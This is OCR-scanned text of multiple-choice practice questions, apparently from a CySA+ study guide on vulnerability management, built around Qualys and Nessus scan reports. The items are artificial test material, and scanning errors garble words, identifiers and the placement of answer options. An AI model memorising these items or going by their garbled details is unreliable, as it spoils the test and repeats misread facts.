U -~ UU BW OW WO & & & F&F S&F S&F S&F S&F SF fF SF HH AH WwW Ww Ww W WwW WwW Ww 


5 


wo 


Red Hat Update for firefox Security (RHSA-2017:0459) 
Red Hat Update for openssh Security (RHSA-2017:0641) 
Red Hat Update for coreutils Security (RHSA-2017:0654) 
Red Hat Update for glibc Security (RHSA-2017:0680) 
Red Hat Update for subscription-manager Security (RHSA-2017:0698) 
Red Hat Update for bash Security (RHSA-2017:0725) 
Red Hat Update for kerne! Security (RHSA-2017:0817) 
Red Hat Update for curl Security (RHSA-2017:0847) 

Red Hat Update for gnutis Security (RHSA-2017:0574) 
Oracle Java SE Critical Patch Update - October 2016 
Oracle Java SE Critical Patch Update - January 2017 
Red Hat Update for Firefox Security (RHSA-2017:0190) 
Oracle Java SE Critical Patch Update - October 2015 
Oracle Java SE Critical Patch Update - January 2016 
Oracle Java SE Critical Patch Update - July 2015 

Oracle Java SE Critical Patch Update - July 2016 

Oracle Java SE Critical Patch Update - April 2016 

Red Hat Update for kernel (RHSA-2016:2006) 

Red Hat Update for kernel (RHSA-2016:2105) (Dirty Cow) 
Red Hat Update for kernel (RHSA-2016:2766) 

Red Hat Update for Kernel Security (RHSA-2017:0036) 
Red Hat Update for mysql Security (RHSA-2017:0184) 
Red Hat Update for Kernel Security (RHSA-2017:0293) 
Red Hat Update for libtiff Security (RHSA-2017:0225) 
Red Hat Update for ntp security (RHSA-2017:0252) 

Red Hat Update for openss! Security (RHSA-2017:0286) 
Red Hat Update for Kernel Security (RHSA-2017:0307) 
Non-Zero Padding Bytes Observed in Ethernet Packets 
Red Hat OpenSSL Denial of Service Vulnerability 


CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 
CVSS: 


CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS3: 
CVSS: - CVSS3: - 


New 
New 
New 
New 
New 
New 
New 
New 
New 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Active 
Fixed 


4 
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This server requires one or more Linux patches. 
This server requires one or more Oracle database patches. 


This server requires one or more Firefox patches. 


Ipwp 


This server requires one or more MySQL patches. 


146. Donna is working with a system engineer who wants to remediate vulnerabilities in a 
server that he manages. Of the report templates shown here, which would be most useful 
to the engineer? 


% Title a Type Vulnerability Data 
©) 2008 SANS Top 20 Report {A Host Based 
©) Executive Report @4 Host Based 
) ® High Severity Report @q Host Based 
© Payment Card Industry (PCI) Executive Report {A Scan Based 
©) Payment Card Industry (PCI) Technical Report {ZA Scan Based 
©) Qualys Patch Report @ Host Based 
©) Qualys Top 20 Report {A Host Based 
I & Technical Report @q Host Based 
~) © Unknown Device Report +} Scan Based 


Qualys Top 20 Report 
PCI Technical Report 


Executive Report 


oO WD > 


D. Technical Report 


147. James received the vulnerability report shown here for a server in his organization. What 
risks does this vulnerability present? 


v BM 4 Unauthenticated Access to FTP Server Allowed 


First Detected: 07/16/2014 at 20:06:22 (GMT-0400) Last Detected: 04/05/2017 at 00:05:04 (GMT-0400) 
QID: 27210 CVSS Base: 7.84) 
Category: File Transfer Protocol CVSS Temporal: 7 
CVE ID: - CVSS3 Base: 

Vendor Reference - CVSS3 Temporal: 

Bugtraq ID: - CVSS Environment: 

Service Modified: 10/25/2007 Asset Group: 

User Modified: ° Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Open Integrity Requirement: 


Availability Requirement: 


Unauthorized access to files stored on the server 
Theft of credentials 


Eavesdropping on communications 


All of the above 
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148. Tom runs a vulnerability scan of the file server shown here. 


Internet 





\ j File Server 


DMZ 





Email Server Web Server 


He receives the vulnerability report shown next. Assuming that the firewall is configured 
properly, what action should Tom take immediately? 


v 172.19001 Ee E E ees Windows 2008 R2 Enterprise Service Pack 1 
~ Vulnerabilities (5) HE 
> EEE |3 Windows Remote Desktop Protocol Weak Encryption Method Allowed port 3389/tcp CVSS: - CVSS3:- Active ($~) 
> HM |3 Built-in Guest Account Not Renamed at Windows Target System CVSS: - CVSS3:- Active 
> HIM |3 Administrator Account's Password Does Not Expire CVSS: - CVSS3:- Active ($7) 
> EI |2 FIN-ACK Network Device Driver Frame Padding Information Disclosure Vulnerability CVSS: - CVSS3:- Active ($~) 
>E | 1 Non-Zero Padding Bytes Observed in Ethernet Packets CVSS: - CVSS3:- Fixed [+] 
A. Block RDP access to this server from all hosts. 
B. Review and secure server accounts. 
C. Upgrade encryption on the server. 


No action is required. 


149. Dave is running a vulnerability scan of a client’s network for the first time. The client has 
never run such a scan and expects to find many results. What security control is likely to 
remediate the largest portion of the vulnerabilities discovered in Dave’s scan? 


A. Input validation 

B. Patching 

C. Intrusion prevention systems 
D 


Encryption 
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151. 
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Matt is working to integrate his organization’s network with that of a recently acquired 
company. He is concerned that the acquired company’s network contains systems with 
vulnerabilities that may be exploited and wants to protect his network against compro- 
mised hosts on the new network. Which one of the following controls would be least effec- 
tive at reducing the risk from network interconnection? 


A. Network segmentation 

B. VLAN separation 

C. Firewall 

D. Proxy server 

Rhonda is planning to patch a production system to correct a vulnerability detected during 


a scan. What process should she follow to correct the vulnerability but minimize the risk 
of a system failure? 


A. Rhonda should deploy the patch immediately on the production system. 


B. Rhonda should wait 60 days to deploy the patch to determine whether bugs are 
reported. 


C. Rhonda should deploy the patch in a sandbox environment to test it prior to applying 
it in production. 


D. Rhonda should contact the vendor to determine a safe timeframe for deploying the 
patch in production. 


William is preparing a legal agreement for his organization to purchase services from a 
vendor. He would like to document the requirements for system availability, including the 
vendor’s allowable downtime for patching. What type of agreement should William use to 
incorporate this requirement? 


A. MOU 
B. SLA 
C. BPA 
D. BIA 


Given no other information, which one of the following vulnerabilities would you consider 
the greatest threat to information confidentiality? 


A. HTTP TRACE/TRACK methods enabled 

B. SSL Server with SSLv3 enabled vulnerability 

C. phpinfo information disclosure vulnerability 

D. Web application SQL injection vulnerability 

Which one of the following mobile device strategies is most likely to result in the introduc- 
tion of vulnerable devices to a network? 

A. COPE 

B. TLS 


155. 
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C. BYOD 
D. MDM 


Kassie discovered the vulnerability shown here on one of the servers running in her organi- 
zation. What action should she take? 


Microsoft Windows Server 2003 Unsupported Installation Detection 


Description 


The remote host is running Microsoft Windows Server 2003. Support for this operating system by Microsoft ended July 14th, 2015. 


Decommission this server. 
Run Windows Update to apply security patches. 


Require strong encryption for access to this server. 
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No action is required. 


Morgan recently completed the security analysis of a web browser deployed on systems in 

her organization and discovered that it is susceptible to a zero-day integer overflow attack. 
Who is in the best position to remediate this vulnerability in a manner that allows contin- 

ued use of the browser? 


A. Morgan 
B. The browser developer 
C. The network administrator 


D. The domain administrator 


157. Jeff’s team is preparing to deploy a new database service, and he runs a vulnerability scan 


v' 


of the test environment. This scan results in the four vulnerability reports shown here. Jeff 
is primarily concerned with correcting issues that may lead to a confidentiality breach. 
Which vulnerability should Jeff remediate first? 


man of = m a mn NetApp 


w Vulnerabilities (2) HE 


> EEE 3 Rational ClearCase Portscan Denial of Service Vulnerability port 371/tcp CVSS: - CVSS3: - New [d7] 
> 1 Non-Zero Padding Bytes Observed in Ethernet Packets CVSS: - CVSS3:- Active {+} 
v 8 Bo es 6 So Linux 2.4-2.6 


w Vulnerabilities (3) HE 


> EEEN | 4 Oracle Database TNS Listener Poison Attack Vulnerability port 1521/tcp CVSS: - CVSS3:- Active [$~] 
> Ba 2 Hidden RPC Services CVSS: - CVSS3: - Active 


> Ba 2 UDP Constant IP Identification Field Fingerprinting Vulnerability CVSS: - CVSS3: - Active ~) 
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Rational ClearCase Portscan Denial of Service vulnerability 
Non-Zero Padding Bytes Observed in Ethernet Packets 
Oracle Database TNS Listener Poison Attack vulnerability 
Hidden RPC Services 
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158. Eric is a security consultant and is trying to sell his services to a new client. He would like 


to run a vulnerability scan of their network prior to their initial meeting to show the client 
the need for added security. What is the most significant problem with this approach? 


A. Eric does not know the client’s infrastructure design. 
B. Eric does not have permission to perform the scan. 
C. Eric does not know what operating systems and applications are in use. 


D. Eric does not know the IP range of the client’s systems. 


159. Renee is assessing the exposure of her organization to the denial-of-service vulnerability in 


v 


the scan report shown here. She is specifically interested in determining whether an exter- 
nal attacker would be able to exploit the denial-of-service vulnerability. Which one of the 

following sources of information would provide her with the best information to complete 
this assessment? 


Bao 3 MediaWiki Information Disclosure,Denial of Service and Multiple Cross-Site Scripting Vulnerabilities 


First Detected: 04/09/2017 at 04:49:37 (GMT-0400) Last Detected: 04/09/2017 at 04:49:37 (GMT-0400) 
QID: 12828 CVSS Base: 7.5 
Category: CGI CVSS Temporal: 5.5 
CVE ID: CVE-2013-6451 CVE-2013-6452 CVE- CVSS3 Base: - 
2013-6453 CVE-2013-6454 CVE-2013- CVSS3 Temporal: ° 
6455 CVE-2013-4570 CVE-2013-4571 CVSS Environment: 
CVE-2013-6472 CVE-2013-4574 Asset Group: - 
Vendor Reference MediaWiki Collateral Damage Potential: - 
Bugtraq ID: - Target Distribution: - 
Service Modified: 03/03/2014 Confidentiality Requirement: - 
User Modified: - Integrity Requirement: - 
Edited: No Availability Requirement: - 
PCI Vuln: Yes 
Ticket State: 
THREAT: 


MediaWiki is free and open source wiki software developed by the Wikimedia. It's used to power wiki web sites such as Wikipedia, Wiktionary and Commons. 

Multiple security vulnerabilities have been reported in MediaWiki, which can be exploited to conduct script insertion attacks and disclose potentially sensitive information. 

- Certain input containing specially crafted CSS tags is not properly sanitized before being used. This can be exploited to insert arbitrary HTML and script code 

- Certain input containing specially crafted XLS tags within a SVG file is not properly sanitized before being used. This can be exploited to inser arbitrary 
HTML and script code 

- An error within the “UploadBase::detectScriptinSvg()" method can be exploited to upload SVG files containing arbitrary script code 

- Certain input containing specially crafted CSS tags is not properly sanitized before being used. This can be exploited to insert arbitrary HTML and script code, 
which will be executed in a user's browser session in context of an affected site if malicious data is viewed 

- Errors within the log API, enhanced RecentChanges, and user watchlists can be exploited to disclose certain information about deleted pages. 

- A cross-site scripting vulnerability in TimedMediaHandler extension exists due to way it stored and used HTML for showing videos 

- NULL pointer dereference in php-luasandbox, which could be used for DoS attacks. 

- Buffer Overfiow in php-luasandbox. 

Affected Version: 

MediaWiki version prior to 1.19.10, 1.21.4, or 1.22.1. 


A. Server logs 


B. Firewall rules 


C. 
D. 
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IDS configuration 


DLP configuration 


160. Mary is trying to determine what systems in her organization should be subject to vulner- 
ability scanning. She would like to base this decision upon the criticality of the system to 
business operations. Where should Mary turn to best find this information? 


161. 


162. 


A. 
B. 
C. 
D. 


The CEO 
System names 
IP addresses 


Asset inventory 


Paul ran a vulnerability scan of his vulnerability scanner and received the result shown 
here. What is the simplest fix to this issue? 
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Tenable Nessus 6.0.x < 6.6 Multiple Vulnerabilities 


Description 


According to its version, the Tenable Nessus application installed on the remote host is 6.x prior to 6.6. It 
is, therefore, affected by multiple vulnerabilities : 


- Across-site scripting (XSS) vulnerability exists due to improper validation of user-supplied input. An 
authenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script 
code in a user's browser session. (CVE-2016-82012) 

- Adenial of service vulnerability exists due to an external entity injection (XXE) flaw that is triggered 


during the parsing of XML data. An authenticated, remote attacker can exploit this, via specially crafted 
XML data, to exhaust system resources. (CVE-2016-82013) 


Upgrade Nessus. 
Remove guest accounts. 
Implement TLS encryption. 


Renew the server certificate. 


Sarah is designing a vulnerability management system for her organization. Her highest 
priority is conserving network bandwidth. She does not have the ability to alter the con- 
figuration or applications installed on target systems. What solution would work best in 
Sarah’s environment to provide vulnerability reports? 


A. 


B. 
C. 
D 


Agent-based scanning 
Server-based scanning 
Passive network monitoring 


Port scanning 
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163. Terry is conducting a vulnerability scan when he receives a report that the scan is slow- 
ing down the network for other users. He looks at the performance configuration settings 
shown here. Which setting would be most likely to correct the issue? 


Advanced 


General Settings 


vY Enable safe checks 
Stop scanning hosts that become unresponsive during the scan 
Scan IP addresses in a random order 

Performance Options 
Slow down the scan when network congestion is detected 


Use Linux kernel congestion detection 


Network timeout (in seconds) 5 
Max simultaneous checks per host 5 
Max simultaneous hosts per scan 30 


Max number of concurrent TCP sessions per host 


Max number of concurrent TCP sessions per scan 


Enable safe checks. 
Stop scanning hosts that become unresponsive during the scan. 


Scan IP addresses in random order. 
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Max simultaneous hosts per scan. 


164. Laura received a vendor security bulletin that describes a zero-day vulnerability in her 
organization’s main database server. This server is on a private network but is used by 
publicly accessible web applications. The vulnerability allows the decryption of adminis- 
trative connections to the server. What reasonable action can Laura take to address this 
issue as quickly as possible? 


A. Apply a vendor patch that resolves the issue. 

B. Disable all administrative access to the database server. 

C. Require VPN access for remote connections to the database server. 
D 


Verify that the web applications use strong encryption. 
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165. Emily discovered the vulnerability shown here on a server running in her organization. 
What is the most likely underlying cause for this vulnerability? 


v EEEE 4 Microsoft Windows OLE Remote Code Execution Vulnerability (MS16-044) 


First Detected: 05/04/2016 at 18:05:17 (GMT-0400) Last Detected: 04/04/2017 at 22:07:28 (GMT-0400) 
QID: 91198 CVSS Base: 9.3 
Category: Windows CVSS Temporal: 6.9 
CVE ID: CVE-2016-0153 CVSS3 Base: 7.8 
Vendor Reference MS16-044 CVSS3 Temporal: 6.8 
Bugtraq ID: - CVSS Environment: 

Service Modified: 04/12/2016 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: - 
PCI Vuln: Yes Confidentiality Requirement: - 
Ticket State: Open Integrity Requirement: 


Availability Requirement: 


Failure to perform input validation 
Failure to use strong passwords 


Failure to encrypt communications 
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Failure to install antimalware software 


166. Raul is replacing his organization’s existing vulnerability scanner with a new product that 
will fulfill that functionality moving forward. As Raul begins to build out the policy, he 
notices some conflicts in the scanning settings between different documents. Which one of 
the following document sources should Raul give the highest priority when resolving these 
conflicts? 


A. NIST guidance documents 
B. Vendor best practices 
C. Corporate policy 
D. Configuration settings from the prior system 
167. Rex recently ran a vulnerability scan of his organization’s network and received the results 


shown here. He would like to remediate the server with the highest number of the most serious 
vulnerabilities first. Which one of the following servers should be on his highest priority list? 








Dashboard conroe {an vuinorabiites Levels MIM Lovos MENO tevols MEN ye 
Tue 11 April 2017 : - > 
31 IP Addresses scanned 1 96 3 1 Potential 8 7 Potential 69 53 Potential Add IPs to scan 
Most vulnerable hosts View All Operating System 
Host (by IP and OS) Last Scan Date Total Vulns Level 5 Level 4 Level 3 Total Assets 
10.0.102.58 August 26,2016 17 1 2 y \ 31 
10.0.23.139 August 26, 2016 3 1 2 14 Unn bel’ 
10.0.16.58 August 26,2016 19 3 6 5 Linux 2.6 
10.0.26.150 August 26,2016 8 2 4 1 Linux 2.4-2.6/E 
10.0.80.91 August 26,2016 8 2 4 
10.0.5.179 August 26,2016 4 1 2 
10.0.46.116 August 26,2016 14 8 
10.0.46.45 August 26,2016 12 4 
10.0.38.156 August 26,2016 11 3 
10.0.88.169 August 26,2016 2 2 
10.0.69.232 August 26,2016 5 2 
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A. 10.0.102.58 
B. 10.0.16.58 

C. 10.0.46.116 
D. 10.0.69.232 


Beth is configuring a vulnerability scanning tool. She recently learned about a privilege esca- 
lation vulnerability that requires the user already have local access to the system. She would 
like to ensure that her scanners are able to detect this vulnerability as well as future similar 
vulnerabilities. What action can she take that would best improve the scanner’s ability to 
detect this type of issue? 


A. Enable credentialed scanning. 

B. Runa manual vulnerability feed update. 

C. Increase scanning frequency. 

D. Change the organization’s risk appetite. 

Shannon reviewed the vulnerability scan report for a web server and found that it has mul- 


tiple SQL injection and cross-site scripting vulnerabilities. What would be the least diffi- 
cult way for Shannon to address these issues? 


A. Install a web application firewall. 

B. Recode the web application to include input validation. 

C. Apply security patches to the server operating system. 

D. Apply security patches to the web server service. 

Ron is responsible for distributing vulnerability scan reports to system engineers who will 


remediate the vulnerabilities. What would be the most effective and secure way for Ron to 
distribute the reports? 


A. Ron should configure the reports to generate automatically and provide immediate, 
automated notification to administrators of the results. 


B. Ron should run the reports manually and send automated notifications after he 
reviews them for security purposes. 


C. Ron should run the reports on an automated basis and then manually notify adminis- 
trators of the results after he reviews them. 


D. Ron should run the reports manually and then manually notify administrators of the 
results after he reviews them. 


Karen ran a vulnerability scan of a web server used on her organization’s internal network. 
She received the report shown here. What circumstances would lead Karen to dismiss this 
vulnerability as a false positive? 
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v Be 2 SSL Certificate - Signature Verification Failed Vulnerability 
First Detected: 05/11/2013 at 02:00:07 (GMT-0400) Last Detected: 04/04/2017 at 21:30:12 (GMT-0400) 
QID: 38173 CVSS Base: 9.4) 
Category: General remote services CVSS Temporal: 6.8 
CVE ID: - CVSS3 Base: . 
Vendor Reference’ - CVSS3 Temporal: - 
Bugtraq ID: : CVSS Environment: 
Service Modified: 05/22/2009 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: - 
PCI Vuln: Yes Confidentiality Requirement: - 
Ticket State: Integrity Requirement: - 
Availability Requirement: - 
THREAT: 


An SSL Certificate associates an entity (person, organization, host, etc.) with a Public Key. In an SSL connection, the client 
authenticates the remote server using the server's Certificate and extracts the Public Key in the Certificate to establish the 
secure connection. The authentication is done by verifying that the public key in the certificate is signed by a trusted 
third-party Certificate Authority. 

If a client is unable to verify the certificate, it can abort communication or prompt the user to continue the communication 
without authentication. 


IMPACT: 

By exploiting this vulnerability, man-in-the-middle attacks in tandem with DNS cache poisoning can occur. 

Exception: 

If the server communicates only with a restricted set of clients who have the server certificate or the trusted CA certificate, 
then the server or CA certificate may not be available publicly, and the scan will be unable to verify the signature. 


SOLUTION: 
Please install a server certificate signed by a trusted third-party Certificate Authority. 


EXPLOITABILITY: 
There is no exploitability information for this vulnerability. 


The server is running SSLv2. 
The server is running SSLv3. 


The server is for internal use only. 
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The server does not contain sensitive information. 
172. Which one of the following vulnerabilities is the most difficult to confirm with an external 
vulnerability scan? 
A. Cross-site scripting 
B. Cross-site request forgery 
C. Blind SQL injection 
D. Unpatched web server 
173. Ann would like to improve her organization’s ability to detect and remediate security vul- 


nerabilities by adopting a continuous monitoring approach. Which one of the following is 
not a characteristic of a continuous monitoring program? 


A. Analyzing and reporting findings 

B. Conducting forensic investigations when a vulnerability is exploited 
C. Mitigating the risk associated with findings 

D. ‘Transferring the risk associated with a finding to a third party 
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174. Holly ran a scan of a server in her data center and the most serious result was the 
vulnerability shown here. What action is most commonly taken to remediate this 
vulnerability? 


v Be 3 phpinfo Information Disclosure Vulnerability 


First Detected: 07/17/2016 at 12:02:41 (GMT-0400) Last Detected: 04/09/2017 at 17:39:08 (GMT-0400) 
QID: 10464 CVSS Base: 5) 
Category: CGI CVSS Temporal: 3.8 
CVE ID: - CVSS3 Base: ° 
Vendor Reference - CVSS3 Temporal: - 
Bugtraq ID: - CVSS Environment: 

Service Modified: 06/21/2015 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: . 
PCI Vuln: Yes Confidentiality Requirement: - 
Ticket State: Integrity Requirement: - 


Availability Requirement: - 


THREAT: 

This host has a publicly-accessible PHP file that calis the phpinfo() function (or some other function similar to it). 

If a user requests this file (such as via an Internet browser), the user may obtain a page containing sensitive information 
about the Web server host. The information displayed to the user could include the exact version numbers of various software 
products (Operating Systems, Web Servers, PHP, XML, MySQL), the values of some environment variables (SPATH, 


SSYSTEM_ROOT), paths to various programs (cmd.exe), and much more. 
To get specific information about the type of data your host displayed, please refer to the "Result" field below. 


IMPACT: 
By exploiting this vulnerability, any user could obtain very sensitive information about the Web server host. This information 
may aid in attacks against the host. 


Remove the file from the server. 
Edit the file to limit information disclosure. 


Password protect the file. 
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Limit file access to a specific IP range. 


175. Nitesh would like to identify any systems on his network that are not registered with his 
asset management system. He looks at the reporting console of his vulnerability scanner 
and sees the options shown here. Which of the following report types would be his best 
likely starting point? 


$) Title a Type Vulnerability Data 
©) 2008 SANS Top 20 Report {A Host Based 
D © Executive Report G4 Host Based 
T) © High Severity Report 4 Host Based 
©) Payment Card Industry (PCI) Executive Report {A Scan Based 
©) Payment Card Industry (PCI) Technical Report {ZA Scan Based 
-) © Qualys Patch Report @ Host Based 
©) Qualys Top 20 Report {A Host Based 
D & Technical Report @4 Host Based 
~ © Unknown Device Report sfe Scan Based 


176. 


177. 


Chapter 2 = Domain 2: Vulnerability Management 129 


Technical Report 
High Severity Report 
Qualys Patch Report 
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Unknown Device Report 

What strategy can be used to immediately report configuration changes to a vulnerability 
scanner? 

A. Scheduled scans 

B. Continuous monitoring 

C. Automated remediation 

D. Automatic updates 

During a recent vulnerability scan, Mark discovered a flaw in an internal web application 
that allows cross-site scripting attacks. He spoke with the manager of the team responsible 
for that application and was informed that he discovered a known vulnerability and the 


manager worked with other leaders and determined that the risk is acceptable and does 
not require remediation. What should Mark do? 


A. Object to the manager’s approach and insist upon remediation. 
B. Mark the vulnerability as a false positive. 
C. Schedule the vulnerability for remediation in six months. 


D. Mark the vulnerability as an exception. 


178. Jacquelyn recently read about a new vulnerability in Apache web servers that allows 


179. 


attackers to execute arbitrary code from a remote location. She verified that her servers 
have this vulnerability, but this morning’s vulnerability scan report shows that the servers 
are secure. She contacted the vendor and determined that they have released a signature 
for this vulnerability and it is working properly at other clients. What action can Jacquelyn 
take that will most likely address the problem efficiently? 


A. Add the web servers to the scan. 

B. Reboot the vulnerability scanner. 

C. Update the vulnerability feed. 

D. Wait until tomorrow’s scan. 

Dennis is developing a checklist that will be used by different security teams within his 


broad organization. What SCAP component can he use to help write the checklist and 
report results in a standardized fashion? 


A. XCCDF 
B. CCE 
C.. CPE 
D. CVE 
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180. Vincent is a security manager for a U.S. federal government agency subject to FISMA. 
Which one of the following is not a requirement that he must follow for his vulnerability 
scans to maintain FISMA compliance? 


A. 


B. 
C. 
D. 


Run complete scans on at least a monthly basis. 
Use tools that facilitate interoperability and automation. 
Remediate legitimate vulnerabilities. 


Share information from the vulnerability scanning process. 


181. Sharon is designing a new vulnerability scanning system for her organization. She must 
scan a network that contains hundreds of unmanaged hosts. Which of the following tech- 
niques would be most effective at detecting system configuration issues in her environment? 


A. 


B. 
C. 
D. 


Agent-based scanning 
Credentialed scanning 
Server-based scanning 


Passive network monitoring 


Questions 182 through 184 refer to the following scenario: 


Arlene ran a vulnerability scan of a VPN server used by contractors and employees to gain 
access to her organization’s network. An external scan of the server found the vulnerabil- 
ity shown here. 


SSL Certificate Signed Using Weak Hashing Algorithm < 


Description 


The remote service uses an SSL certificate chain that has been signed using a cryptographically weak hashing algorithm 
These signature algorithms are known to be vulnerable to collision attacks. An attacker can exploit this to generate another certificate with the same digital 
signature, allowing an attacker to masquerade as the affected service. 


Note that this plugin reports all SSL certificate chains signed with SHA-1 that expire after January 1, 2017 as vulnerable. This is in accordance with 
Google's gradual sunsetting of the SHA-1 cryptographic hash algorithm. 


Note that certificates in the chain that are contained in the Nessus CA database have been ignored. 


182. Which one of the following hash algorithms would not trigger this vulnerability? 


A. 


B. 
C. 
D. 


MD4 
MDS 
SHA-1 
SHA-256 


183. What is the most likely result of failing to correct this vulnerability? 


A. 


B. 
C. 
D 


All users will be able to access the site. 
All users will be able to access the site, but some may see an error message. 
Some users will be unable to access the site. 


All users will be unable to access the site. 
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184. How can Josh correct this vulnerability? 
A. Reconfigure the VPN server to only use secure hash functions. 
B. Request a new certificate. 
C. Change the domain name of the server. 
D. Implement an intrusion prevention system. 
185. After reviewing the results of a vulnerability scan, Bruce discovered that many of the 
servers in his organization are susceptible to a brute-force SSH attack. He would like to 


determine what external hosts attempted SSH connections to his servers and is reviewing 
firewall logs. What TCP port would relevant traffic most likely use? 


A. 22 

B. 636 
C. 1433 
D. 1521 


186. Terry runs a vulnerability scan of the network devices in his organization and sees the vul- 
nerability report shown here for one of those devices. What action should he take? 


v Be 2 SSL Certificate - Subject Common Name Does Not Match Server FQDN port 443/tcp over SSL Active ($~) 
First Detected: 08/22/2016 at 20:52:54 (GMT-0400) Last Detected: 04/11/2017 at 09:54:48 (GMT-0400) Times Detected: 6 Last Fixed: N/A 
QID: 38170 
Category: General remote services 
CVE ID: - 

Vendor Reference 

Bugtraq ID: - 

Service Modified: 08/12/2015 
User Modified: - 

Edited: No 

PCI Vuln: No 


No action is necessary because this is an informational report. 


A 
B. Upgrade the version of the certificate. 
C. Replace the certificate. 

D 


Verify that the correct ciphers are being used. 


187. Lori is studying vulnerability scanning as she prepares for the CySA+ exam. Which of the 
following is not one of the principles she should observe when preparing for the exam to 
avoid causing issues for her organization? 


A. Run only nondangerous scans on production systems to avoid disrupting a production 
service. 


B. Run scans in a quiet manner without alerting other IT staff to the scans or their 
results to minimize the impact of false information. 


C. Limit the bandwidth consumed by scans to avoid overwhelming an active network link. 


D. Run scans outside of periods of critical activity to avoid disrupting the business. 
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188. Meredith is configuring a vulnerability scan and would like to configure the scanner to 
perform credentialed scans. Of the menu options shown here, which will allow her to 
directly configure this capability? 





Manage Vulnerability Scans 


Launch new vulnerability scans, monitor the status 
of running scans and view the details of 
vulnerabilities discovered after scans complete. 


Watch demo (j) 


Manage Discovery Scans 


Use free discovery scans (maps) to discover live 
devices on your network. Discovered devices can 
be selected for vulnerability scanning based on the 
info gathered (OS, ports, etc.) in a map. 


Watch demo (j) 


Configure Scan Settings 


Customize the various scanning options required 
to run a scan. These can be saved as profiles for 


Dp p HE 


Configure Scan Schedules 


Configure scans to run automatically, or on a 
recurring basis and monitor results of your scans. 


Watch demo (j) 


Configure Scanner 


Appliances 

Scanner Appliances (physical or virtual) are 
required to scan devices on internal networks. 
Managers can download appliances and configure 
them for scanning. 


Set Up Host Authentication 


Use the authentication feature (Windows, Linux, 
Oracle, etc.) to discover and validate vulnerabilities 


4 reuse. A default profile is provided for common by performing an in-depth assessment of your 
environments. hosts. 
Watch demo (j) Watch demo Ch 
— Configure Search Lists 
=s Apply custom lists of vulnerabilities to scan profiles 
me o in order to limit scanning to certain vulnerabilities 
only. 
A. Manage Discovery Scans 
B. Configure Scan Settings 
C. Configure Search Lists 
D. Set Up Host Authentication 


189. Norman is working with his manager to implement a vulnerability management program 
for his company. His manager tells him that he should focus on remediating critical and 
high-severity risks and that the organization does not want to spend time worrying about 
risks rated medium or lower. What type of criteria is Norman’s manager using to make 


this decision? 

A. Risk appetite 
B. False positive 
C. False negative 


D. Data classification 


190. After running a vulnerability scan against his organization’s VPN server, Chis discovered 
the vulnerability shown here. What type of cryptographic situation does a birthday attack 


leverage? 


191. 


Chapter 2 = Domain 2: Vulnerability Management 


w Vulnerabilities (8) HE 
v BG 3 Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) 


First Detected: 04/05/2017 at 03:14:48 (GMT-0400) Last Detected: 04/05/2017 at 03:14:48 (GMT-0400) 
QID: 38657 CVSS Base: 5 
Category: General remote services CVSS Temporal: 4.3 
CVE ID: CVE-2016-2183 CVSS3 Base: 5.3 
Vendor Reference - CVSS3 Temporal: 4.9 
Bugtraq ID: 92630, 95568 CVSS Environment: 

Service Modified: 04/04/2017 Asset Group: - 
User Modified: - Collateral Damage Potential: - 
Edited: No Target Distribution: - 
PCI Vuln: Yes Confidentiality Requirement: - 
Ticket State: Integrity Requirement: 


Availability Requirement: 


Unsecured key 
Meet-in-the-middle 
Man-in-the-middle 


Collision 


99 9 > 


133 


Meredith recently ran a vulnerability scan on her organization’s accounting network seg- 
ment and found the vulnerability shown here on several workstations. What would be the 


most effective way for Meredith to resolve this vulnerability? 


v BM 5 Adobe Flash Player Remote Code Execution Vulnerability (APSB17-07) 


First Detected: 04/05/2017 at 01:00:07 (GMT-0400) Last Detected: 04/05/2017 at 01:00:07 (GMT-0400) 
QID: 370337 CVSS Base: 10 
Category: Local CVSS Temporal: 7.4 
CVE ID: CVE-2017-2997 CVE-2017-2998 CVE- CVSS3 Base: 9.8 
2017-2999 CVE-2017-3000 CVE-2017- CVSS3 Temporal: 8.5 
3001 CVE-2017-3002 CVE-2017-3003 CVSS Environment: 
Vendor Reference APSB17-07 Asset Group: - 
Bugtraq ID: 96860, 96866, 96862, 96861 Collateral Damage Potential: - 
Service Modified: 03/17/2017 Target Distribution: - 
User Modified: - Confidentiality Requirement: - 
Edited: No Integrity Requirement: - 
PCI Vuln: Yes Availability Requirement: - 
Ticket State: Open 
THREAT: 


Cross-platform plugin plays animations, videos and sound files in .SWF format. 

These vulnerabilities that could potentially allow an attacker to take control of the affected system. 

(CVE-2017-2997, CVE-2017-2998, CVE-2017-2999, CVE-2017-3000, CVE-2017-3001, CVE-2017-3002, CVE-2017-3003) 
Affected Versions: 

Adobe Flash Player 24.0.0.221 and earlier 


IMPACT: 
Successful exploitation allows a remote, unauthenticated attacker to execute arbitrary code on a targeted system. 


A. Remove Flash Player from the workstations. 


OO 


Apply the security patches described in the Adobe bulletin. 


C. Configure the network firewall to block unsolicited inbound access to these 
workstations. 


D. Install an intrusion detection system on the network. 
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Questions 192 through 197 refer to the vulnerability shown here. 


(===) Web Application SQL Backend Identification Plugin Details 
i Severity: Medium 

Description 

ID: 44670 
At least one web application hosted on the remote web server is built on a SQL backend that Nessus was Version: $Revision: 1.10 $ 
able to identify by looking at error messages. Type: Snai 

: cena . , , . scenes i Family: CGI abuses 

